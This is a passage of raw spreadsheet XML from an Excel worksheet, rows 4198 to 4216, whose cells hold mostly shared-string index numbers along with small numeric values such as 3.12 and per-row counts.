        <v>31582</v>
      </c>
      <c r="N4198" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4198" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4198" s="12" t="s">
        <v>26985</v>
      </c>
      <c r="Q4198" s="12">
        <v>3.12</v>
      </c>
      <c r="R4198" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4198" s="12" t="s">
        <v>26986</v>
      </c>
      <c r="T4198" s="12" t="s">
        <v>26667</v>
      </c>
      <c r="U4198" s="12" t="s">
        <v>26987</v>
      </c>
      <c r="V4198" s="12" t="s">
        <v>26469</v>
      </c>
      <c r="W4198" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4198" s="12">
        <v>10</v>
      </c>
      <c r="Y4198" s="12" t="s">
        <v>26988</v>
      </c>
    </row>
    <row r="4199" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4199" s="12">
        <v>64541</v>
      </c>
      <c r="B4199" s="12" t="s">
        <v>31166</v>
      </c>
      <c r="C4199" s="12" t="s">
        <v>31167</v>
      </c>
      <c r="D4199" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4199" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4199" s="12" t="s">
        <v>31153</v>
      </c>
      <c r="G4199" s="12" t="s">
        <v>26998</v>
      </c>
      <c r="H4199" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4199" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J4199" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K4199" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4199" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4199" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4199" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4199" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4199" s="12" t="s">
        <v>26999</v>
      </c>
      <c r="Q4199" s="12">
        <v>3.12</v>
      </c>
      <c r="R4199" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4199" s="12" t="s">
        <v>27000</v>
      </c>
      <c r="T4199" s="12" t="s">
        <v>27001</v>
      </c>
      <c r="U4199" s="12" t="s">
        <v>27002</v>
      </c>
      <c r="V4199" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W4199" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4199" s="12">
        <v>27</v>
      </c>
      <c r="Y4199" s="12" t="s">
        <v>27003</v>
      </c>
    </row>
    <row r="4200" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4200" s="12">
        <v>64651</v>
      </c>
      <c r="B4200" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4200" s="12" t="s">
        <v>30392</v>
      </c>
      <c r="F4200" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4200" s="12" t="s">
        <v>27004</v>
      </c>
      <c r="H4200" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4200" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J4200" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K4200" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4200" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4200" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4200" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4200" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4200" s="12" t="s">
        <v>27005</v>
      </c>
      <c r="Q4200" s="12">
        <v>3.12</v>
      </c>
      <c r="R4200" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4200" s="12" t="s">
        <v>27006</v>
      </c>
      <c r="T4200" s="12" t="s">
        <v>27007</v>
      </c>
      <c r="U4200" s="12" t="s">
        <v>27008</v>
      </c>
      <c r="V4200" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W4200" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4200" s="12">
        <v>6</v>
      </c>
      <c r="Y4200" s="12" t="s">
        <v>27009</v>
      </c>
    </row>
    <row r="4201" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4201" s="12">
        <v>65151</v>
      </c>
      <c r="B4201" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4201" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4201" s="12" t="s">
        <v>30360</v>
      </c>
      <c r="G4201" s="12" t="s">
        <v>27010</v>
      </c>
      <c r="H4201" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4201" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4201" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K4201" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4201" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4201" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4201" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4201" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4201" s="12" t="s">
        <v>27011</v>
      </c>
      <c r="Q4201" s="16">
        <v>3.1</v>
      </c>
      <c r="R4201" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4201" s="12" t="s">
        <v>27012</v>
      </c>
      <c r="T4201" s="12" t="s">
        <v>26962</v>
      </c>
      <c r="U4201" s="12" t="s">
        <v>27013</v>
      </c>
      <c r="V4201" s="12" t="s">
        <v>10166</v>
      </c>
      <c r="W4201" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4201" s="12">
        <v>10</v>
      </c>
      <c r="Y4201" s="12" t="s">
        <v>27014</v>
      </c>
    </row>
    <row r="4202" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4202" s="12">
        <v>65501</v>
      </c>
      <c r="B4202" s="12" t="s">
        <v>31368</v>
      </c>
      <c r="D4202" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E4202" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4202" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4202" s="12" t="s">
        <v>27015</v>
      </c>
      <c r="H4202" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4202" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4202" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="K4202" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4202" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4202" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4202" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4202" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4202" s="12" t="s">
        <v>27016</v>
      </c>
      <c r="Q4202" s="12">
        <v>3.12</v>
      </c>
      <c r="R4202" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4202" s="12" t="s">
        <v>27017</v>
      </c>
      <c r="T4202" s="12" t="s">
        <v>27018</v>
      </c>
      <c r="U4202" s="12" t="s">
        <v>27019</v>
      </c>
      <c r="V4202" s="12" t="s">
        <v>27020</v>
      </c>
      <c r="W4202" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4202" s="12">
        <v>26</v>
      </c>
      <c r="Y4202" s="12" t="s">
        <v>27021</v>
      </c>
    </row>
    <row r="4203" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4203" s="12">
        <v>65541</v>
      </c>
      <c r="B4203" s="12" t="s">
        <v>30225</v>
      </c>
      <c r="D4203" s="12" t="s">
        <v>30232</v>
      </c>
      <c r="E4203" s="12" t="s">
        <v>31454</v>
      </c>
      <c r="F4203" s="12" t="s">
        <v>30237</v>
      </c>
      <c r="G4203" s="12" t="s">
        <v>27026</v>
      </c>
      <c r="H4203" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4203" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4203" s="12" t="s">
        <v>26257</v>
      </c>
      <c r="K4203" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4203" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4203" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4203" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4203" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4203" s="12">
        <v>3.11</v>
      </c>
      <c r="Q4203" s="12">
        <v>3.11</v>
      </c>
      <c r="R4203" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4203" s="12" t="s">
        <v>27027</v>
      </c>
      <c r="T4203" s="12" t="s">
        <v>5074</v>
      </c>
      <c r="U4203" s="12" t="s">
        <v>27028</v>
      </c>
      <c r="V4203" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W4203" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4203" s="12">
        <v>1</v>
      </c>
      <c r="Y4203" s="12" t="s">
        <v>27029</v>
      </c>
    </row>
    <row r="4204" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4204" s="12">
        <v>65651</v>
      </c>
      <c r="B4204" s="12" t="s">
        <v>31368</v>
      </c>
      <c r="D4204" s="12" t="s">
        <v>31369</v>
      </c>
      <c r="F4204" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4204" s="12" t="s">
        <v>27030</v>
      </c>
      <c r="H4204" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4204" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J4204" s="12" t="s">
        <v>258</v>
      </c>
      <c r="K4204" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4204" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4204" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4204" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4204" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4204" s="12" t="s">
        <v>27005</v>
      </c>
      <c r="Q4204" s="12">
        <v>3.12</v>
      </c>
      <c r="R4204" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4204" s="12" t="s">
        <v>27031</v>
      </c>
      <c r="T4204" s="12" t="s">
        <v>27032</v>
      </c>
      <c r="U4204" s="12" t="s">
        <v>27033</v>
      </c>
      <c r="V4204" s="12" t="s">
        <v>27034</v>
      </c>
      <c r="W4204" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4204" s="12">
        <v>8</v>
      </c>
      <c r="Y4204" s="12" t="s">
        <v>27035</v>
      </c>
    </row>
    <row r="4205" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4205" s="12">
        <v>66001</v>
      </c>
      <c r="B4205" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4205" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D4205" s="12" t="s">
        <v>30817</v>
      </c>
      <c r="F4205" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4205" s="12" t="s">
        <v>27036</v>
      </c>
      <c r="H4205" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4205" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4205" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4205" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4205" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4205" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4205" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4205" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4205" s="12" t="s">
        <v>27037</v>
      </c>
      <c r="Q4205" s="12">
        <v>3.12</v>
      </c>
      <c r="R4205" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4205" s="12" t="s">
        <v>27038</v>
      </c>
      <c r="T4205" s="12" t="s">
        <v>27039</v>
      </c>
      <c r="U4205" s="12" t="s">
        <v>26300</v>
      </c>
      <c r="V4205" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4205" s="12">
        <v>63091</v>
      </c>
      <c r="X4205" s="12">
        <v>18</v>
      </c>
      <c r="Y4205" s="12" t="s">
        <v>27040</v>
      </c>
    </row>
    <row r="4206" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4206" s="12">
        <v>66771</v>
      </c>
      <c r="B4206" s="12" t="s">
        <v>29939</v>
      </c>
      <c r="C4206" s="12" t="s">
        <v>29940</v>
      </c>
      <c r="D4206" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4206" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4206" s="12" t="s">
        <v>29941</v>
      </c>
      <c r="G4206" s="12" t="s">
        <v>27041</v>
      </c>
      <c r="H4206" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4206" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4206" s="12" t="s">
        <v>2609</v>
      </c>
      <c r="K4206" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4206" s="12" t="s">
        <v>26139</v>
      </c>
      <c r="M4206" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4206" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4206" s="12" t="s">
        <v>31592</v>
      </c>
      <c r="P4206" s="12" t="s">
        <v>27042</v>
      </c>
      <c r="Q4206" s="12">
        <v>3.11</v>
      </c>
      <c r="R4206" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4206" s="12" t="s">
        <v>27043</v>
      </c>
      <c r="T4206" s="12" t="s">
        <v>27044</v>
      </c>
      <c r="U4206" s="12" t="s">
        <v>27045</v>
      </c>
      <c r="V4206" s="12" t="s">
        <v>27020</v>
      </c>
      <c r="W4206" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4206" s="12">
        <v>18</v>
      </c>
      <c r="Y4206" s="12" t="s">
        <v>27046</v>
      </c>
    </row>
    <row r="4207" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4207" s="12">
        <v>67351</v>
      </c>
      <c r="B4207" s="12" t="s">
        <v>30225</v>
      </c>
      <c r="D4207" s="12" t="s">
        <v>30232</v>
      </c>
      <c r="E4207" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4207" s="12" t="s">
        <v>30220</v>
      </c>
      <c r="G4207" s="12" t="s">
        <v>27047</v>
      </c>
      <c r="H4207" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4207" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4207" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K4207" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4207" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4207" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4207" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4207" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4207" s="12" t="s">
        <v>27048</v>
      </c>
      <c r="Q4207" s="12">
        <v>3.8</v>
      </c>
      <c r="R4207" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4207" s="12" t="s">
        <v>27049</v>
      </c>
      <c r="T4207" s="12" t="s">
        <v>27050</v>
      </c>
      <c r="U4207" s="12" t="s">
        <v>27051</v>
      </c>
      <c r="V4207" s="12" t="s">
        <v>21160</v>
      </c>
      <c r="W4207" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4207" s="12">
        <v>8</v>
      </c>
      <c r="Y4207" s="12" t="s">
        <v>27052</v>
      </c>
    </row>
    <row r="4208" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4208" s="12">
        <v>67561</v>
      </c>
      <c r="B4208" s="12" t="s">
        <v>30515</v>
      </c>
      <c r="C4208" s="12" t="s">
        <v>30561</v>
      </c>
      <c r="D4208" s="12" t="s">
        <v>30562</v>
      </c>
      <c r="E4208" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4208" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4208" s="12" t="s">
        <v>27053</v>
      </c>
      <c r="H4208" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4208" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J4208" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K4208" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4208" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4208" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4208" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4208" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4208" s="12">
        <v>3.12</v>
      </c>
      <c r="Q4208" s="12">
        <v>3.12</v>
      </c>
      <c r="R4208" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4208" s="12" t="s">
        <v>27054</v>
      </c>
      <c r="T4208" s="12" t="s">
        <v>27055</v>
      </c>
      <c r="U4208" s="12" t="s">
        <v>27056</v>
      </c>
      <c r="V4208" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W4208" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4208" s="12">
        <v>8</v>
      </c>
      <c r="Y4208" s="12" t="s">
        <v>27057</v>
      </c>
    </row>
    <row r="4209" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4209" s="12">
        <v>67811</v>
      </c>
      <c r="B4209" s="12" t="s">
        <v>31368</v>
      </c>
      <c r="D4209" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E4209" s="18" t="s">
        <v>31425</v>
      </c>
      <c r="F4209" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4209" s="12" t="s">
        <v>27058</v>
      </c>
      <c r="H4209" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4209" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J4209" s="12" t="s">
        <v>4248</v>
      </c>
      <c r="K4209" s="12" t="s">
        <v>20257</v>
      </c>
      <c r="L4209" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4209" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4209" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4209" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4209" s="12" t="s">
        <v>27059</v>
      </c>
      <c r="Q4209" s="12">
        <v>3.13</v>
      </c>
      <c r="R4209" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4209" s="12" t="s">
        <v>27060</v>
      </c>
      <c r="T4209" s="12" t="s">
        <v>27061</v>
      </c>
      <c r="U4209" s="12" t="s">
        <v>27062</v>
      </c>
      <c r="V4209" s="12" t="s">
        <v>5099</v>
      </c>
      <c r="W4209" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4209" s="12">
        <v>17</v>
      </c>
      <c r="Y4209" s="12" t="s">
        <v>27063</v>
      </c>
    </row>
    <row r="4210" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4210" s="12">
        <v>67821</v>
      </c>
      <c r="B4210" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4210" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4210" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4210" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4210" s="12" t="s">
        <v>27064</v>
      </c>
      <c r="H4210" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4210" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4210" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K4210" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4210" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4210" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4210" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4210" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4210" s="12" t="s">
        <v>27059</v>
      </c>
      <c r="Q4210" s="12">
        <v>3.13</v>
      </c>
      <c r="R4210" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4210" s="12" t="s">
        <v>27065</v>
      </c>
      <c r="T4210" s="12" t="s">
        <v>26533</v>
      </c>
      <c r="U4210" s="12" t="s">
        <v>27066</v>
      </c>
      <c r="V4210" s="12" t="s">
        <v>6918</v>
      </c>
      <c r="W4210" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4210" s="12">
        <v>5</v>
      </c>
      <c r="Y4210" s="12" t="s">
        <v>27067</v>
      </c>
    </row>
    <row r="4211" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4211" s="12">
        <v>68801</v>
      </c>
      <c r="B4211" s="12" t="s">
        <v>31368</v>
      </c>
      <c r="D4211" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E4211" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4211" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4211" s="12" t="s">
        <v>27072</v>
      </c>
      <c r="H4211" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4211" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J4211" s="12" t="s">
        <v>258</v>
      </c>
      <c r="K4211" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4211" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4211" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4211" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4211" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4211" s="12" t="s">
        <v>27073</v>
      </c>
      <c r="Q4211" s="12">
        <v>3.12</v>
      </c>
      <c r="R4211" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4211" s="12" t="s">
        <v>27074</v>
      </c>
      <c r="T4211" s="12" t="s">
        <v>27075</v>
      </c>
      <c r="U4211" s="12" t="s">
        <v>27076</v>
      </c>
      <c r="V4211" s="12" t="s">
        <v>3984</v>
      </c>
      <c r="W4211" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4211" s="12">
        <v>17</v>
      </c>
      <c r="Y4211" s="12" t="s">
        <v>27077</v>
      </c>
    </row>
    <row r="4212" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4212" s="12">
        <v>69011</v>
      </c>
      <c r="B4212" s="12" t="s">
        <v>31137</v>
      </c>
      <c r="D4212" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4212" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4212" s="12" t="s">
        <v>31168</v>
      </c>
      <c r="G4212" s="12" t="s">
        <v>27079</v>
      </c>
      <c r="H4212" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4212" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4212" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K4212" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4212" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4212" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4212" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4212" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4212" s="12" t="s">
        <v>27080</v>
      </c>
      <c r="Q4212" s="12">
        <v>3.13</v>
      </c>
      <c r="R4212" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4212" s="12" t="s">
        <v>27081</v>
      </c>
      <c r="T4212" s="12" t="s">
        <v>27082</v>
      </c>
      <c r="U4212" s="12" t="s">
        <v>27083</v>
      </c>
      <c r="V4212" s="12" t="s">
        <v>21160</v>
      </c>
      <c r="W4212" s="12" t="s">
        <v>27084</v>
      </c>
      <c r="X4212" s="12">
        <v>63</v>
      </c>
      <c r="Y4212" s="12" t="s">
        <v>27085</v>
      </c>
    </row>
    <row r="4213" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4213" s="12">
        <v>69031</v>
      </c>
      <c r="B4213" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4213" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4213" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4213" s="12" t="s">
        <v>30767</v>
      </c>
      <c r="G4213" s="12" t="s">
        <v>27086</v>
      </c>
      <c r="H4213" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4213" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4213" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K4213" s="12" t="s">
        <v>27087</v>
      </c>
      <c r="L4213" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4213" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4213" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4213" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4213" s="12" t="s">
        <v>26939</v>
      </c>
      <c r="Q4213" s="12">
        <v>3.12</v>
      </c>
      <c r="R4213" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4213" s="12" t="s">
        <v>27088</v>
      </c>
      <c r="T4213" s="12" t="s">
        <v>27089</v>
      </c>
      <c r="U4213" s="12" t="s">
        <v>27090</v>
      </c>
      <c r="V4213" s="12" t="s">
        <v>10538</v>
      </c>
      <c r="W4213" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4213" s="12">
        <v>1</v>
      </c>
      <c r="Y4213" s="12" t="s">
        <v>27091</v>
      </c>
    </row>
    <row r="4214" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4214" s="12">
        <v>69041</v>
      </c>
      <c r="B4214" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4214" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D4214" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4214" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4214" s="12" t="s">
        <v>30286</v>
      </c>
      <c r="G4214" s="12" t="s">
        <v>27092</v>
      </c>
      <c r="H4214" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4214" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4214" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K4214" s="12" t="s">
        <v>27087</v>
      </c>
      <c r="L4214" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4214" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4214" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4214" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4214" s="12" t="s">
        <v>26939</v>
      </c>
      <c r="Q4214" s="12">
        <v>3.12</v>
      </c>
      <c r="R4214" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4214" s="12" t="s">
        <v>27093</v>
      </c>
      <c r="T4214" s="12" t="s">
        <v>27089</v>
      </c>
      <c r="U4214" s="12" t="s">
        <v>27090</v>
      </c>
      <c r="V4214" s="12" t="s">
        <v>10538</v>
      </c>
      <c r="W4214" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4214" s="12">
        <v>1</v>
      </c>
      <c r="Y4214" s="12" t="s">
        <v>28174</v>
      </c>
    </row>
    <row r="4215" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4215" s="12">
        <v>69091</v>
      </c>
      <c r="B4215" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4215" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4215" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4215" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4215" s="12" t="s">
        <v>27094</v>
      </c>
      <c r="H4215" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4215" s="12" t="s">
        <v>5208</v>
      </c>
      <c r="J4215" s="12" t="s">
        <v>5209</v>
      </c>
      <c r="K4215" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4215" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4215" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4215" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4215" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4215" s="12" t="s">
        <v>27078</v>
      </c>
      <c r="Q4215" s="12">
        <v>3.12</v>
      </c>
      <c r="R4215" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4215" s="12" t="s">
        <v>27095</v>
      </c>
      <c r="T4215" s="12" t="s">
        <v>27096</v>
      </c>
      <c r="U4215" s="12" t="s">
        <v>27097</v>
      </c>
      <c r="V4215" s="12" t="s">
        <v>5209</v>
      </c>
      <c r="W4215" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4215" s="12">
        <v>3</v>
      </c>
      <c r="Y4215" s="12" t="s">
        <v>27098</v>
      </c>
    </row>
    <row r="4216" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4216" s="12">
        <v>69461</v>
      </c>
      <c r="B4216" s="12" t="s">
        <v>31137</v>
      </c>
      <c r="D4216" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4216" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4216" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4216" s="12" t="s">
        <v>27099</v>
      </c>
      <c r="H4216" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4216" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4216" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4216" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4216" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4216" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4216" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4216" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4216" s="12">
        <v>3.13</v>
      </c>
